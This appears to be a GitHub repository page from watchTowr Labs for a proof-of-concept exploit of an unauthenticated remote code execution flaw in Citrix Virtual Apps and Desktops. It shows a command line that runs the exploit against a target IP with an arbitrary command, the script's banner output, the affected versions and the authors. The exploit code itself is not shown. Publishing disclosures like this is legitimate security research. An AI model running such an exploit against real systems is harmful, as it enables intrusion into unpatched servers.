Skip to content

Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE

Notifications You must be signed in to change notification settings

watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2024-xxxx

Citrix Virtual Apps and Desktops (XEN) Unauthenticated Remote Code execution

See our blog post for technical details

citrix-xen-exploit-demo.mp4

PoC in Action

python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-xxxx-xxxxx.py
        (*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr

          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])

        CVEs: [CVE-xxxx-xxxxx]

[INFO] Command sent to 192.168.1.120 successfully!

Affected Versions

Any version from Citrix Virtual Apps and Desktops 7 2402 LTSR and before are vulnerable, more details at citrix advisory

Exploit authors

This exploit was written by Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber)

Follow watchTowr Labs

For the latest security research follow the watchTowr Labs Team

About

Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages